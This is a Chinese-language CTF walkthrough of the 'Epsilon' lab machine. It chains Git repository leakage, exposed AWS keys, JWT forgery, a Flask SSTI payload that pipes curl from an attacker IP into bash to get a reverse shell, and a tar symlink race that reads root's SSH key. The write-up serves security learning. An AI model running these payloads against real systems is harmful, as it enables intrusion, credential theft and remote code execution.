Epsilon 靶机渗透测试与权限提升完整指南<\/h1>

信息收集阶段<\/h2>

初始扫描<\/h3>
目标IP: 10.10.11.134<\/code><\/p>
开放端口:<\/p>

22\/tcp - OpenSSH 8.2p1 Ubuntu<\/li>
80\/tcp - Apache httpd 2.4.41 (返回403)<\/li>
5000\/tcp - Werkzeug httpd 2.0.2 (Python 3.8.10)<\/li>
<\/ul>
主机发现与扫描<\/h3>
ip=<\/span>'10.10.11.134'<\/span>; itf=<\/span>'tun0'<\/span>
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span>
<\/span><\/span>  echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>
<\/span><\/span>  ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>
<\/span><\/span>  if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span>
<\/span><\/span>    echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>
<\/span><\/span>    nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>
<\/span><\/span>  else<\/span>
<\/span><\/span>    echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>
<\/span><\/span>  fi<\/span>
<\/span><\/span>else<\/span>
<\/span><\/span>  echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>Git信息泄露利用<\/h2>
发现和下载Git仓库<\/h3>
dirb http:\/\/10.10.11.134
<\/span><\/span>git-dumper http:\/\/10.10.11.134\/.git\/ \/tmp\/res
<\/span><\/span><\/code><\/pre>关键文件分析<\/h3>
发现两个重要文件:<\/p>

server.py<\/code> - Flask应用程序<\/li>
track_api_CR_148.py<\/code> - 包含AWS凭证<\/li>
<\/ol>
AWS凭证泄露与利用<\/h2>
提取AWS凭证<\/h3>
从Git历史中获取:<\/p>
git log -p --all
<\/span><\/span><\/code><\/pre>发现AWS凭证:<\/p>

Access Key ID: AQLA5M37BDN6FJP76TDC<\/code><\/li>
Secret Access Key: OsK0o\/glWwcjk2U3vVEowkvq5t4EiIreB+WdFo1A<\/code><\/li>
<\/ul>
配置AWS CLI<\/h3>
aws configure
<\/span><\/span><\/code><\/pre>输入获取的凭证和区域us-east-1<\/code><\/p>
列出Lambda函数<\/h3>
aws --endpoint-url=<\/span>http:\/\/cloud.epsilon.htb lambda list-functions
<\/span><\/span><\/code><\/pre>获取特定函数信息<\/h3>
aws --endpoint-url=<\/span>http:\/\/cloud.epsilon.htb lambda get-function --function-name=<\/span>costume_shop_v1
<\/span><\/span><\/code><\/pre>从响应中获取JWT密钥: RrXCv<\/code>mrNe!K!4+5wYq<\/code><\/p>
JWT伪造与认证绕过<\/h2>
生成管理员JWT令牌<\/h3>
import<\/span> jwt
<\/span><\/span>print("Cookie: auth="<\/span>+<\/span>jwt.<\/span>encode({"username"<\/span>: "admin"<\/span>, "password"<\/span>: "admin"<\/span>}, "RrXCv`mrNe!K!4+5`wYq"<\/span>, algorithm=<\/span>"HS256"<\/span>))
<\/span><\/span><\/code><\/pre>验证网站<\/h3>
whatweb http:\/\/epsilon.htb:5000\/home --cookie=<\/span>'auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiJ9.r6AIIBdhkEV-3LEXG1usQ40lEDpHywesJwRqFc-FgcA'<\/span>
<\/span><\/span><\/code><\/pre>Flask SSTI漏洞利用<\/h2>
构造SSTI Payload<\/h3>
通过\/order<\/code>路由的costume<\/code>参数注入:<\/p>
costume={{request.application.__globals__.__builtins__.__import__('os').popen('curl+10.10.16.33\/reverse.sh|bash').read()}}
<\/code><\/pre>
完整HTTP请求<\/h3>
POST<\/span> \/order HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> epsilon.htb:5000<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/112.0<\/span>
<\/span><\/span>Accept:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<\/span>
<\/span><\/span>Accept-Language:<\/span> en-US,en;q=0.5<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>Content-Length:<\/span> 31<\/span>
<\/span><\/span>Origin:<\/span> http:\/\/epsilon.htb:5000<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>Referer:<\/span> http:\/\/epsilon.htb:5000\/order<\/span>
<\/span><\/span>Cookie:<\/span> auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiJ9.r6AIIBdhkEV-3LEXG1usQ40lEDpHywesJwRqFc-FgcA<\/span>
<\/span><\/span>Upgrade-Insecure-Requests:<\/span> 1<\/span>
<\/span><\/span>
<\/span><\/span>costume={{request.application.__globals__.__builtins__.__import__('os').popen('curl+10.10.16.33\/reverse.sh|bash').read()}}&q=fff&addr=dddd
<\/span><\/span><\/code><\/pre>权限提升: tar符号链接劫持<\/h2>
分析备份脚本<\/h3>
发现备份脚本存在漏洞:<\/p>
\/usr\/bin\/tar -chvf "\/var\/backups\/web_backups\/<\/span>${<\/span>check_file}<\/span>.tar"<\/span> \/opt\/backups\/checksum "\/opt\/backups\/<\/span>$file.tar"<\/span>
<\/span><\/span><\/code><\/pre>缺少-h<\/code>参数导致符号链接可以被劫持<\/p>
利用步骤<\/h3>

监控\/opt\/backups\/checksum<\/code>文件创建<\/li>
快速替换为指向root SSH私钥的符号链接<\/li>
等待备份完成<\/li>
<\/ol>
ls -la \/var\/backups\/web_backups\/; 
<\/span><\/span>while<\/span> ! [<\/span> -e \/opt\/backups\/checksum ]<\/span>; do<\/span> :; done<\/span>; 
<\/span><\/span>rm -rf \/opt\/backups\/checksum &&<\/span> ln -sf \/root\/.ssh\/id_rsa \/opt\/backups\/checksum;
<\/span><\/span>ls -la \/var\/backups\/web_backups\/
<\/span><\/span><\/code><\/pre>关键文件位置<\/h2>

用户flag: \/home\/user\/user.txt<\/code> (e1c8605ea5b043a7fc870cadea41d42a)<\/li>
root flag: \/root\/root.txt<\/code><\/li>
<\/ul>
总结<\/h2>
本靶机涉及多个关键漏洞:<\/p>

Git信息泄露导致AWS凭证暴露<\/li>
JWT密钥硬编码导致认证绕过<\/li>
Flask SSTI模板注入<\/li>
tar备份脚本符号链接劫持漏洞<\/li>
<\/ol>
通过综合利用这些漏洞，可以从信息收集逐步提升到root权限。<\/p>